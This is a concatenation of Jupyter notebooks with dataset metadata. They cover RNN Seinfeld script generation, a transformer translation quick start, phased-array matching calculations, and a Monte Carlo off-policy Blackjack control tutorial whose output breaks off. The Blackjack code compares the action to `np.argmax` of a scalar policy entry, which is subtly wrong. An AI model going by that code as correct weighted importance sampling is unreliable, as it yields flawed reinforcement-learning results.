3.3748793692588808\n\nEpoch: 7/9 Loss: 3.400786780834198\n\nEpoch: 7/9 Loss: 3.4115707964897157\n\nEpoch: 7/9 Loss: 3.4002523488998415\n\nEpoch: 7/9 Loss: 3.4308757686614992\n\nEpoch: 7/9 Loss: 3.403478935718536\n\nEpoch: 7/9 Loss: 3.4190732889175415\n\nEpoch: 7/9 Loss: 3.436656415462494\n\nEpoch: 8/9 Loss: 3.3615086432950045\n\nEpoch: 8/9 Loss: 3.2641971321105956\n\nEpoch: 8/9 Loss: 3.283445837497711\n\nEpoch: 8/9 Loss: 3.2901403641700746\n\nEpoch: 8/9 Loss: 3.3264351720809935\n\nEpoch: 8/9 Loss: 3.3202496209144594\n\nEpoch: 8/9 Loss: 3.3229446692466738\n\nEpoch: 8/9 Loss: 3.3508189005851747\n\nEpoch: 8/9 Loss: 3.3521045947074892\n\nEpoch: 8/9 Loss: 3.346731041908264\n\nEpoch: 8/9 Loss: 3.3734106063842773\n\nEpoch: 8/9 Loss: 3.379966462612152\n\nEpoch: 8/9 Loss: 3.38812366771698\n\nEpoch: 9/9 Loss: 3.2891932857540986\n\nEpoch: 9/9 Loss: 3.213767638206482\n\nEpoch: 9/9 Loss: 3.239010145187378\n\nEpoch: 9/9 Loss: 3.2513397607803345\n\nEpoch: 9/9 Loss: 3.258533630371094\n\nEpoch: 9/9 Loss: 3.2619752712249754\n\nEpoch: 9/9 Loss: 3.275171920776367\n\nEpoch: 9/9 Loss: 3.2787757329940797\n\nEpoch: 9/9 Loss: 3.28660843372345\n\nEpoch: 9/9 Loss: 3.293291466712952\n\nEpoch: 9/9 Loss: 3.327093819618225\n\nEpoch: 9/9 Loss: 3.320905412197113\n\nEpoch: 9/9 Loss: 3.3482332491874693\n\n" ] ], [ [ "### Question: How did you decide on your model hyperparameters? \nFor example, did you try different sequence_lengths and find that one size made the model converge faster? What about your hidden_dim and n_layers; how did you decide on those?", "_____no_output_____" ], [ "**Answer:** Most of the params were selected based on community input gathered from online sources. Sequence length was a little special in that I could not find many suggestions online, I tested, 4, 6, 8, 16, 32, 64, 128, and 1024 length sequences. I found that smaller sequences where effective, but I am not conclusive. 8 achieved the best results in a fairly short time.\n\nI also tested other params like hidden dims and layers, etc. The conclusion was that higher embedding dims did not improve performance, while higher hidden dims did, 2-3 layers seems to offer little difference in performance.", "_____no_output_____" ], [ "---\n# Checkpoint\n\nAfter running the above training cell, your model will be saved by name, `trained_rnn`, and if you save your notebook progress, **you can pause here and come back to this code at another time**. You can resume your progress by running the next cell, which will load in our word:id dictionaries _and_ load in your saved model by name!", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport torch\nimport helper\nimport problem_unittests as tests\n\n_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()\ntrained_rnn = helper.load_model('./save/trained_rnn')", "_____no_output_____" ] ], [ [ "## Generate TV Script\nWith the network trained and saved, you'll use it to generate a new, \"fake\" Seinfeld TV script in this section.\n\n### Generate Text\nTo generate the text, the network needs to start with a single word and repeat its predictions until it reaches a set length. You'll be using the `generate` function to do this. It takes a word id to start with, `prime_id`, and generates a set length of text, `predict_len`. Also note that it uses topk sampling to introduce some randomness in choosing the most likely next word, given an output set of word scores!", "_____no_output_____" ] ], [ [ "\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\nimport torch.nn.functional as F\n\ndef generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):\n \"\"\"\n Generate text using the neural network\n :param decoder: The PyTorch Module that holds the trained neural network\n :param prime_id: The word id to start the first prediction\n :param int_to_vocab: Dict of word id keys to word values\n :param token_dict: Dict of puncuation tokens keys to puncuation values\n :param pad_value: The value used to pad a sequence\n :param predict_len: The length of text to generate\n :return: The generated text\n \"\"\"\n rnn.eval()\n \n # create a sequence (batch_size=1) with the prime_id\n current_seq = np.full((1, sequence_length), pad_value)\n current_seq[-1][-1] = prime_id\n predicted = [int_to_vocab[prime_id]]\n \n for _ in range(predict_len):\n if train_on_gpu:\n current_seq = torch.LongTensor(current_seq).cuda()\n else:\n current_seq = torch.LongTensor(current_seq)\n \n # initialize the hidden state\n hidden = rnn.init_hidden(current_seq.size(0))\n \n # get the output of the rnn\n output, _ = rnn(current_seq, hidden)\n \n # get the next word probabilities\n p = F.softmax(output, dim=1).data\n if(train_on_gpu):\n p = p.cpu() # move to cpu\n \n # use top_k sampling to get the index of the next word\n top_k = 5\n p, top_i = p.topk(top_k)\n top_i = top_i.numpy().squeeze()\n \n # select the likely next word index with some element of randomness\n p = p.numpy().squeeze()\n word_i = np.random.choice(top_i, p=p/p.sum())\n \n # retrieve that word from the dictionary\n word = int_to_vocab[word_i]\n predicted.append(word) \n \n # the generated word becomes the next \"current sequence\" and the cycle can continue\n current_seq = np.roll(current_seq, -1, 1)\n current_seq[-1][-1] = word_i\n \n gen_sentences = ' '.join(predicted)\n \n # Replace punctuation tokens\n for key, token in token_dict.items():\n ending = ' ' if key in ['\\n', '(', '\"'] else ''\n gen_sentences = gen_sentences.replace(' ' + token.lower(), key)\n gen_sentences = gen_sentences.replace('\\n ', '\\n')\n gen_sentences = gen_sentences.replace('( ', '(')\n \n # return all the sentences\n return gen_sentences", "_____no_output_____" ] ], [ [ "### Generate a New Script\nIt's time to generate the text. Set `gen_length` to the length of TV script you want to generate and set `prime_word` to one of the following to start the prediction:\n- \"jerry\"\n- \"elaine\"\n- \"george\"\n- \"kramer\"\n\nYou can set the prime word to _any word_ in our dictionary, but it's best to start with a name for generating a TV script. (You can also start with any other names you find in the original text file!)", "_____no_output_____" ] ], [ [ "import numpy as np\n# run the cell multiple times to get different results!\ngen_length = 400 # modify the length to your preference\nprime_word = 'jerry' # name for starting the script\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\npad_word = helper.SPECIAL_WORDS['PADDING']\ngenerated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)\nprint(generated_script)", "/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:35: UserWarning: RNN module weights are not part of single contiguous chunk of memory. This means they need to be compacted at every call, possibly greatly increasing memory usage. To compact weights again call flatten_parameters().\n" ] ], [ [ "#### Save your favorite scripts\n\nOnce you have a script that you like (or find interesting), save it to a text file!", "_____no_output_____" ] ], [ [ "# save script to a text file\nf = open(\"generated_script_1.txt\",\"w\")\nf.write(generated_script)\nf.close()", "_____no_output_____" ] ], [ [ "# The TV Script is Not Perfect\nIt's ok if the TV script doesn't make perfect sense. It should look like alternating lines of dialogue, here is one such example of a few generated lines.\n\n### Example generated script\n\n>jerry: what about me?\n>\n>jerry: i don't have to wait.\n>\n>kramer:(to the sales table)\n>\n>elaine:(to jerry) hey, look at this, i'm a good doctor.\n>\n>newman:(to elaine) you think i have no idea of this...\n>\n>elaine: oh, you better take the phone, and he was a little nervous.\n>\n>kramer:(to the phone) hey, hey, jerry, i don't want to be a little bit.(to kramer and jerry) you can't.\n>\n>jerry: oh, yeah. i don't even know, i know.\n>\n>jerry:(to the phone) oh, i know.\n>\n>kramer:(laughing) you know...(to jerry) you don't know.\n\nYou can see that there are multiple characters that say (somewhat) complete sentences, but it doesn't have to be perfect! It takes quite a while to get good results, and often, you'll have to use a smaller vocabulary (and discard uncommon words), or get more data. The Seinfeld dataset is about 3.4 MB, which is big enough for our purposes; for script generation you'll want more than 1 MB of text, generally. \n\n# Submitting This Project\nWhen submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as \"dlnd_tv_script_generation.ipynb\" and save another copy as an HTML file by clicking \"File\" -> \"Download as..\"->\"html\". Include the \"helper.py\" and \"problem_unittests.py\" files in your submission. Once you download these files, compress them into one zip file for submission.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb205be94f3a467a685f1134c3e2dcdbfbbe26b5
6,310
ipynb
Jupyter Notebook
examples/quick_start.ipynb
brokenegg/transformer
c402ccffd6be1e01c589ad2b9064a5837d4464c7
[ "Apache-2.0" ]
null
null
null
examples/quick_start.ipynb
brokenegg/transformer
c402ccffd6be1e01c589ad2b9064a5837d4464c7
[ "Apache-2.0" ]
null
null
null
examples/quick_start.ipynb
brokenegg/transformer
c402ccffd6be1e01c589ad2b9064a5837d4464c7
[ "Apache-2.0" ]
null
null
null
27.434783
185
0.561014
[ [ [ "# BrokenEgg Transformer quick start\n\n[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/brokenegg/transformer/blob/master/examples/quick_start.ipynb)", "_____no_output_____" ] ], [ [ "!pip install git+https://github.com/brokenegg/transformer.git", "_____no_output_____" ], [ "%%shell\ngsutil cp gs://brokenegg/pretrained/model_base_20200623.tar.bz2 .\ntar xfj model_base_20200623.tar.bz2", "Copying gs://brokenegg/pretrained/model_base_20200623.tar.bz2...\n| [1 files][819.1 MiB/819.1 MiB] 53.6 MiB/s \nOperation completed over 1 objects/819.1 MiB. \n" ], [ "from brokenegg_transformer import transformer\nfrom brokenegg_transformer import model_params\nfrom brokenegg_transformer.utils import tokenizer\nimport tensorflow.compat.v1 as tf\nimport numpy as np", "_____no_output_____" ], [ "# Creating translation model\nparams = model_params.BASE_PARAMS.copy()\nparams[\"dtype\"] = tf.float32\nwith tf.name_scope(\"model\"):\n model = transformer.create_model(params, is_train=False, has_initial_ids=True)\ninit_weight_path = tf.train.latest_checkpoint(\"./model_base_20200623\")\nprint('Restoring from %s' % init_weight_path)\ncheckpoint = tf.train.Checkpoint(model=model)\ncheckpoint.restore(init_weight_path)", "Restoring from ./model_base_20200623/ctl_step_760000.ckpt-38\n" ], [ "# Creating tokenizer\npath = './model_base_20200623/brokenegg.en-es-ja.spm64k.model'\nsubtokenizer = tokenizer.Subtokenizer(path)", "INFO:tensorflow:Initializing Subtokenizer from file ./model_base_20200623/brokenegg.en-es-ja.spm64k.model.\n" ], [ "#text = 'US is located in the west.'\ntext = 'Hello! I am going to school.'\n#text = 'Note: this transformer folder is subject to be integrated into official/nlp folder.'\ntext = 'They include President Trump\\'s former lawyer Michael Cohen who has served a prison sentence for lying to Congress and campaign finance fraud.'\n#text = '元気ですか?'\n#text = 'Are you sure?'\n#text = '¿Estás seguro?'\n#text = 'どこ行こうか?'\ntext = '愛している'\n\n# task_id is one of 1, 64000, 64001, 64002\n# 1: Conversation\n# 64000: Translate from Spanish/Japanese to English\n# 64001: Translate from English/Japanese to English\n# 64002: Translate from English/Spanishe to Japanese\n\ntask_id = 1\nencoded = subtokenizer.encode(text, add_eos=True)\noutput, score = model.predict([np.array([encoded], dtype=np.int64), np.array([task_id], dtype=np.int32)])\nprint(output)\nencoded_output = []\nfor _id in output[0]:\n _id = int(_id)\n if _id == tokenizer.EOS_ID:\n break\n encoded_output.append(_id)\ndecoded_output = subtokenizer.decode(encoded_output)\nprint(decoded_output)", "[[ 6 21 450 21 450 21 450 21 450 21 450 21 450 21 450 21 450 21\n 450 21 450 21 450 21 450 21 450 2 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]]\nはいはいはいはいはいはいはいはいはいはいはいはいはい\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb206c6f593eeae098073bb7de6b2b3cdd6c1256
6,596
ipynb
Jupyter Notebook
f2_twoelement135.ipynb
roseengineering/phasedarray_abcd
4bb94a467898bba7e5f733ebb5dbaef129301dd1
[ "MIT" ]
2
2018-12-31T15:48:55.000Z
2021-08-28T00:19:14.000Z
f2_twoelement135.ipynb
roseengineering/phasedarray_abcd
4bb94a467898bba7e5f733ebb5dbaef129301dd1
[ "MIT" ]
null
null
null
f2_twoelement135.ipynb
roseengineering/phasedarray_abcd
4bb94a467898bba7e5f733ebb5dbaef129301dd1
[ "MIT" ]
null
null
null
22.134228
69
0.449363
[ [ [ "# figure 2", "_____no_output_____" ], [ "import numpy as np\nfrom abcd import *", "_____no_output_____" ], [ "# 2-element array\nz11 = 36.4\nz12 = 15-15j\ni = np.matrix([1, -1j]).T\ne = np.matrix([[z11, z12], [z12, z11]]) * i\nprint('i =\\n', i)\nprint('z =\\n', e / i)", "i =\n [[ 1.+0.j]\n [-0.-1.j]]\nz =\n [[21.4-15.j]\n [51.4+15.j]]\n" ], [ "# at element\nline1 = vec(e[0], i[0])\nstatus(line1, 1)\nline2 = vec(e[1], i[1])\nstatus(line2, 2)\ntotal = power(line1) + power(line2)\nprint('feed power =', total)\nfeed_voltage = np.sqrt(total * 50)\nprint('feed voltage = %.4f' % feed_voltage)\nline1_r = feed_voltage**2 / power(line1)\nline2_r = feed_voltage**2 / power(line2)\nprint('line1 R = %.4f' % line1_r)\nprint('line2 R = %.4f' % line2_r)", "p(1) = 21.4000\nz(1) = 21.4000-15.0000j\ni(1) = 1.0000 / 0.0000\ne(1) = 26.1335 / -35.0279\n\np(2) = 51.4000\nz(2) = 51.4000+15.0000j\ni(2) = 1.0000 / -90.0000\ne(2) = 53.5440 / -73.7312\n\nfeed power = 72.8\nfeed voltage = 60.3324\nline1 R = 170.0935\nline2 R = 70.8171\n" ], [ "print('line1 Emax(rms) = %.4f' % emax(line1))\nprint('line2 Emax(rms) = %.4f' % emax(line2))", "line1 Emax(rms) = 52.6268\nline2 Emax(rms) = 58.7843\n" ], [ "# 135 degree coax line\nline1 = tline(135) * line1\nstatus(line1, 1)\nline2 = tline(135) * line2\nstatus(line2, 2)\nNone", "p(1) = 21.4000\nz(1) = 63.5785-53.9835j\ni(1) = 0.5802 / 148.5572\ne(1) = 48.3888 / 108.2231\n\np(2) = 51.4000\nz(2) = 37.4256+2.6719j\ni(2) = 1.1719 / 51.6641\ne(2) = 43.9714 / 55.7477\n\n" ], [ "# half pi\nz = impedance(line1)\nx = to_halfpi(line1_r, z)[0]\nprint(component(x, 3.8e6))\nline1 = halfpi(*x) * line1\nstatus(line1, 1)\n\nz = impedance(line2)\nx = to_halfpi(line2_r, z)[1]\nprint(component(x, 3.8e6))\nline2 = halfpi(*x) * line2\nstatus(line2, 2)\nNone", "['5.504uH', '1.479nF']\np(1) = 21.4000\nz(1) = 170.0935+0.0000j\ni(1) = 0.3547 / 96.2465\ne(1) = 60.3324 / 96.2465\n\n['558.6pF', '1.369uH']\np(2) = 51.4000\nz(2) = 70.8171+0.0000j\ni(2) = 0.8519 / 95.0313\ne(2) = 60.3324 / 95.0313\n\n" ], [ "# pi circuit\nlag = ephase(line1) - ephase(line2)\nprint('lag21 = {:.4f}'.format(lag))\nx = to_fullpi(lag, line2_r)\nprint(component(x, 3.8e6))\nline2 = fullpi(*x) * line2\nstatus(line2, \"1\")\nlag = ephase(line1) - ephase(line2)\nprint('lag21 = {:.4f}'.format(lag))", "lag21 = 1.2152\n['6.272pF', '62.9nH', '6.272pF']\np(1) = 51.4000\nz(1) = 70.8171-0.0000j\ni(1) = 0.8519 / 96.2465\ne(1) = 60.3324 / 96.2465\n\nlag21 = 0.0000\n" ], [ "print('e(1) = {}'.format(polar(line1[0])))\nprint('e(2) = {}'.format(polar(line2[0])))\nprint('Z line 1 = {:.4f}'.format(impedance(line1)))\nprint('Z line 2 = {:.4f}'.format(impedance(line2)))\nprint('in parallel z = {:.4f}'.format(impedance(line1, line2)))", "e(1) = 60.3324 / 96.2465\ne(2) = 60.3324 / 96.2465\nZ line 1 = 170.0935+0.0000j\nZ line 2 = 70.8171-0.0000j\nin parallel z = 50.0000-0.0000j\n" ], [ "# put all lines in parallel\nprint('feed power = %.4f' % total)\nprint('feed voltage = %.4f' % feed_voltage)\nline = vec(line1[0], line1[1]+line2[1])\nstatus(line, 0)\nNone", "feed power = 72.8000\nfeed voltage = 60.3324\np(0) = 72.8000\nz(0) = 50.0000-0.0000j\ni(0) = 1.2066 / 96.2465\ne(0) = 60.3324 / 96.2465\n\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb2071004dc3925bb86c89288d76e4dfeab21ff7
654,161
ipynb
Jupyter Notebook
_notebooks/2022-01-27-MCControl_OffPolicy_BlackJack.ipynb
LearnableLoopAI/blog2
2b606197293f5c03fd6502b00ab4b2c9d16db5f8
[ "Apache-2.0" ]
null
null
null
_notebooks/2022-01-27-MCControl_OffPolicy_BlackJack.ipynb
LearnableLoopAI/blog2
2b606197293f5c03fd6502b00ab4b2c9d16db5f8
[ "Apache-2.0" ]
null
null
null
_notebooks/2022-01-27-MCControl_OffPolicy_BlackJack.ipynb
LearnableLoopAI/blog2
2b606197293f5c03fd6502b00ab4b2c9d16db5f8
[ "Apache-2.0" ]
null
null
null
497.839422
241,454
0.931402
[ [ [ "# \"Monte Carlo 6: Off-Policy Control with Importance Sampling in Reinforcement Learning\"\n\n> Find the optimal policy using Weighted Importance Sampling\n- toc: true\n- branch: master\n- badges: false\n- comments: true\n- hide: false\n- search_exclude: true\n- metadata_key1: metadata_value1\n- metadata_key2: metadata_value2\n- image: images/MCControl_OffPolicy_BlackJack.png\n- categories: [Reinforcement_Learning,MC, OpenAI,Gym,]\n- show_tags: true", "_____no_output_____" ] ], [ [ "# hide\n# inspired by \n# https://github.com/dennybritz/reinforcement-learning/blob/master/MC/Off-Policy%20MC%20Control%20with%20Weighted%20Importance%20Sampling%20Solution.ipynb", "_____no_output_____" ], [ "#hide\nfrom google.colab import drive\ndrive.mount('/content/gdrive', force_remount=True)\nroot_dir = \"/content/gdrive/My Drive/\"\n# base_dir = root_dir + 'Sutton&Barto/ch05/dennybritz_reinforcement-learning_MC/'\nbase_dir = root_dir + 'Sutton&Barto/'", "Mounted at /content/gdrive\n" ], [ "# hide\n%cd \"{base_dir}\"", "/content/gdrive/My Drive/Sutton&Barto\n" ], [ "# hide\n!pwd", "/content/gdrive/My Drive/Sutton&Barto\n" ] ], [ [ "## 1. Introduction\n\nIn a *Markov Decision Process* (Figure 1) the *agent* and *environment* interacts continuously.\n\n![Figure 1 Agent/Environment interaction in a MDP](../images/mc-prediction_agent-environment_fig1.png \"Figure 1 Agent/Environment interaction in a MDP\")\n\nMore details are available in [Reinforcement Learning: An Introduction by Sutton and Barto](http://incompleteideas.net/book/RLbook2020.pdf).\n\nThe dynamics of the MDP is given by\n$$ \n\\begin{aligned}\np(s',r|s,a) &= Pr\\{ S_{t+1}=s',R_{t+1}=r | S_t=s,A_t=a \\} \\\\\n\\end{aligned}\n$$\n\nThe *policy* of an agent is a mapping from the current state of the environment to an *action* that the agent needs to take in this state. Formally, a policy is given by\n$$ \n\\begin{aligned}\n\\pi(a|s) &= Pr\\{A_t=a|S_t=s\\}\n\\end{aligned}\n$$\n\nThe discounted *return* is given by\n$$ \n\\begin{aligned}\nG_t &= R_{t+1} + \\gamma R_{t+2} + \\gamma ^2 R_{t+3} + ... + R_T \\\\\n &= \\sum_{k=0}^\\infty \\gamma ^k R_{t+1+k}\n\\end{aligned}\n$$\nwhere $\\gamma$ is the discount factor and $R$ is the *reward*.\n\nMost reinforcement learning algorithms involve the estimation of value functions - in our present case, the *state-value function*. The state-value function maps each state to a measure of \"how good it is to be in that state\" in terms of expected rewards. Formally, the state-value function, under policy $\\pi$ is given by\n$$ \n\\begin{aligned}\nv_\\pi(s) &= \\mathbb{E}_\\pi[G_t|S_t=s]\n\\end{aligned}\n$$\n\nThe Monte Carlo algorithm discussed in this post will numerically estimate $v_\\pi(s)$.", "_____no_output_____" ], [ "## 2. Environment", "_____no_output_____" ], [ "The environment is the game of *Blackjack*. The player tries to get cards whose sum is as great as possible without exceeding 21. Face cards count as 10. An ace can be taken either as a 1 or an 11. Two cards are dealth to both dealer and player. One of the dealer's cards is face up (other is face down). The player can request additional cards, one by one (called *hits*) until the player stops (called *sticks*) or goes above 21 (goes *bust* and loses). When the players sticks it becomes the dealer's turn which uses a fixed strategy: sticks when the sum is 17 or greater and hits otherwise. If the dealer goes bust the player wins, otherwise the winner is determined by whose sum is closer to 21.\n\nWe formulate this game as an episodic finite MDP. Each game is an episode. \n\n* States are based on the player's\n * current sum (12-21)\n * player will automatically keep on getting cards until the sum is at least 12 (this is a rule and the player does not have a choice in this matter)\n * dealer's face up card (ace-10)\n * whether player holds usable ace (True or False)\n\nThis gives a total of 200 states: $10 × 10 \\times 2 = 200$\n\n* Rewards:\n * +1 for winning\n * -1 for losing\n * 0 for drawing\n\n* Reward for stick:\n * +1 if sum > sum of dealer\n * 0 if sum = sum of dealer\n * -1 if sum < sum of dealer\n\n* Reward for hit:\n * -1 if sum > 21\n * 0 otherwise\n\nThe environment is implemented using the OpenAI Gym library.", "_____no_output_____" ], [ "## 3. Agent", "_____no_output_____" ], [ "The *agent* is the player. After observing the state of the *environment*, the agent can take one of two possible actions:\n\n* stick (0) [stop receiving cards]\n* hit (1) [have another card]\n\nThe agent's policy will be deterministic - will always stick of the sum is 20 or 21, and hit otherwise. We call this *policy1* in the code.", "_____no_output_____" ], [ "## 4. Monte Carlo Estimation of the Action-value Function, $q_\\pi(s,a)$", "_____no_output_____" ], [ "We will now proceed to estimate the action-value function for the given policy $\\pi$. We can take $\\gamma=1$ as the sum will remain finite:\n\n$$ \\large\n\\begin{aligned}\nq_\\pi(s,a) &= \\mathbb{E}_\\pi[G_t | S_t=s, A_t=a] \\\\\n &= \\mathbb{E}_\\pi[R_{t+1} + \\gamma R_{t+2} + \\gamma ^2 R_{t+3} + ... + R_T | S_t=s, A_t=a] \\\\\n &= \\mathbb{E}_\\pi[R_{t+1} + R_{t+2} + R_{t+3} + ... + R_T | S_t=s, A_t=a]\n\\end{aligned}\n$$\n\nIn numeric terms this means that, given a state and an action, we take the sum of all rewards from that state onwards (following policy $\\pi$) until the game ends, and take the average of all such sequences.\n", "_____no_output_____" ], [ "### 4.1 Off-policy Estimation via Importance Sampling", "_____no_output_____" ], [ "On-policy methods, used so far in this series, represents a compromise. They learn action values not for the optimal policy but for a near-optimal policy that can still explore. The off-policy methods, on the other hand, make use of *two* policies - one that is being optimized (called the *target* policy) and another one (the *behavior* policy) that is used for exploratory purposes. \n\nAn important concept used by off-policy methods is *importance sampling*. This is a general technique for extimating expected values under one distribution by using samples from another. This allows us to weight returns according to the relative probability of a trajectory occurring under the target and behavior policies. This relative probability is called the importance-sampling ratio\n\n$$ \\large\n\\rho_{t:T-1}=\\frac{\\prod_{k=t}^{T-1} \\pi(A_k|S_k) p(S_{k+1}|S_k,A_k)}{\\prod_{k=t}^{T-1} b(A_k|S_k) p(S_{k+1}|S_k,A_k)}=∏_{k=t}^{T-1} \\frac{\\pi(A_k|S_k)}{b(A_k|S_k)}\n$$\n\nwhere $\\pi$ is the *target* policy, and $b$ is the *behavior* policy.\n\nIn oder to estimate $q_{\\pi}(s,a)$ we need to estimate expected returns under the target policy. However, we only have access to returns due to the behavior \npolicy. To perform this \"off-policy\" procedure we can make use of the following:\n\n$$ \\large\n\\begin{aligned}\nq_\\pi(s,a) &= \\mathbb E_\\pi[G_t|S_t=s, A_t=a] \\\\\n &= \\mathbb E_b[\\rho_{t:T-1}G_t|S_t=s, A_t=a]\n\\end{aligned}\n$$\n\nThis allows us to simply scale or weight the returns under $b$ to yield returns under $\\pi$.\n\nIn our current *prediction* problem, both the target and behavior policies are fixed.", "_____no_output_____" ], [ "## 5. Implementation", "_____no_output_____" ], [ "Figure 2 shows the algorithm for off-policy control for the estimation of the optimal policy function:\n\n![Figure 2 MCControl, Off-Policy, for estimating the optimal policy](../images/MCControl_OffPolicy_BlackJack_Algorithm.png \"Figure 2 MCControl, Off-Policy, for estimating the optimal policy\")", "_____no_output_____" ], [ "Next, we present the code that implements the algorithm.", "_____no_output_____" ] ], [ [ "import gym\nimport matplotlib\nimport numpy as np\nimport sys\nfrom collections import defaultdict\nimport pprint as pp\nfrom matplotlib import pyplot as plt\n%matplotlib inline", "_____no_output_____" ], [ "# hide\n# from lib import plotting as myplot\n# from lib.envs.blackjack import BlackjackEnv\nfrom dennybritz_lib import plotting as myplot\nfrom dennybritz_lib.envs.blackjack import BlackjackEnv", "_____no_output_____" ], [ "# hide\n# env = gym.make('Blackjack-v0')#.has differences cp to the one used here\n#- env = gym.make('Blackjack-v1')#.does not exist", "_____no_output_____" ], [ "env = BlackjackEnv()", "_____no_output_____" ] ], [ [ "### 5.1 Policy\n\nThe following function captures the target policy used:", "_____no_output_____" ] ], [ [ "def create_random_policy(n_A):\n A = np.ones(n_A, dtype=float)/n_A\n def policy_function(observation):\n return A\n return policy_function #vector of action probabilities", "_____no_output_____" ], [ "# hide\n# def create_greedy_policy(Q):\n# def policy_function(state):\n# A = np.zeros_like(Q[state], dtype=float)\n# best_action = np.argmax(Q[state])\n# A[best_action] = 1.0\n# return A\n# return policy_function", "_____no_output_____" ], [ "# hide\n# def create_policy():\n# policy = defaultdict(int)\n# for sum in [12, 13, 14, 15, 16, 17, 18, 19, 20, 21]:\n# for showing in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:\n# for usable in [False, True]:\n# policy[(sum, showing, usable)] = np.random.choice([0, 1]) #random\n# # policy[(sum, showing, usable)] = 0 #all zeros\n# return policy", "_____no_output_____" ], [ "def create_policy():\n policy = defaultdict(int)\n return policy", "_____no_output_____" ] ], [ [ "### 5.2 Generate episodes\n\nThe following function sets the environment to a random initial state. It then enters a loop where each iteration applies the policy to the environment's state to obtain the next action to be taken by the agent. That action is then applied to the environment to get the next state, and so on until the episode ends.", "_____no_output_____" ] ], [ [ "def generate_episode(env, policy):\n episode = []\n state = env.reset() #to a random state\n while True:\n probs = policy(state)\n action = np.random.choice(np.arange(len(probs)), p=probs)\n next_state, reward, done, _ = env.step(action) # St+1, Rt+1 OR s',r\n episode.append((state, action, reward)) # St, At, Rt+1 OR s,a,r\n if done:\n break\n state = next_state\n return episode", "_____no_output_____" ] ], [ [ "### 5.3 Main loop\n\nThe following function implements the main loop of the algorithm. It iterates for ``n_episodes``. It also takes a list of ``monitored_state_actions`` for which it will record the evolution of action values. This is handy for showing how action values converge during the process.", "_____no_output_____" ] ], [ [ "def mc_control(env, n_episodes, discount_factor=1.0, monitored_state_actions=None, diag=False):\n #/// G_sum = defaultdict(float)\n #/// G_count = defaultdict(float)\n Q = defaultdict(lambda: np.zeros(env.action_space.n))\n C = defaultdict(lambda: np.zeros(env.action_space.n))\n pi = create_policy()\n monitored_state_action_values = defaultdict(list)\n for i in range(1, n_episodes + 1):\n if i%1000 == 0: print(\"\\rEpisode {}/{}\".format(i, n_episodes), end=\"\"); sys.stdout.flush()\n b = create_random_policy(env.action_space.n)\n episode = generate_episode(env, b); print(f'\\nepisode {i}: {episode}') if diag else None\n G = 0.0\n W = 1.0\n for t in range(len(episode))[::-1]:\n St, At, Rtp1 = episode[t]\n print(f\"---t={t} St, At, Rt+1: {St, At, Rtp1}\") if diag else None\n G = discount_factor*G + Rtp1; print(f\"G: {G}\") if diag else None\n C[St][At] += W; print(f\"C[St][At]: {C[St][At]}\") if diag else None #Weighted Importance Sampling (WIS) denominator\n Q[St][At] += (W/C[St][At])*(G - Q[St][At]); print(f\"Q[St][At]: {Q[St][At]}\") if diag else None\n pi[St] = np.argmax(Q[St]) #greedify pi, max_a Q[state][0], Q[state][1]\n if At != np.argmax(pi[St]):\n break\n W = W*1.0/b(St)[At]; print(f\"W: {W}, b(St)[At]: {b(St)[At]}\") if diag else None\n if monitored_state_actions:\n for msa in monitored_state_actions: \n s = msa[0]; a = msa[1] \n # print(\"\\rQ[{}]: {}\".format(msa, Q[s][a]), end=\"\"); sys.stdout.flush()\n monitored_state_action_values[msa].append(Q[s][a])\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None\n #/// pp.pprint(f'G_sum: {G_sum}') if diag else None\n #/// pp.pprint(f'G_count: {G_count}') if diag else None\n print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None\n print('\\nmonitored_state_action_values:', monitored_state_action_values) if diag else None\n return Q,pi,monitored_state_action_values ", "_____no_output_____" ] ], [ [ "### 5.4 Monitored state-actions\n\nLet's pick a number of state-actions to monitor. Each tuple captures the player's sum, the dealer's showing card, and whether the player has a usable ace, as well as the action taken in the state:", "_____no_output_____" ] ], [ [ "monitored_state_actions=[((21, 7, False), 0), ((20, 7, True), 0), ((12, 7, False), 1), ((17, 7, True), 0)]", "_____no_output_____" ], [ "Q,pi,monitored_state_action_values = mc_control(\n env, \n n_episodes=10, \n monitored_state_actions=monitored_state_actions,\n diag=True)", "\nepisode 1: [((15, 3, False), 1, 0), ((19, 3, False), 1, -1)]\n---t=1 St, At, Rt+1: ((19, 3, False), 1, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\n\nepisode 2: [((18, 1, False), 0, 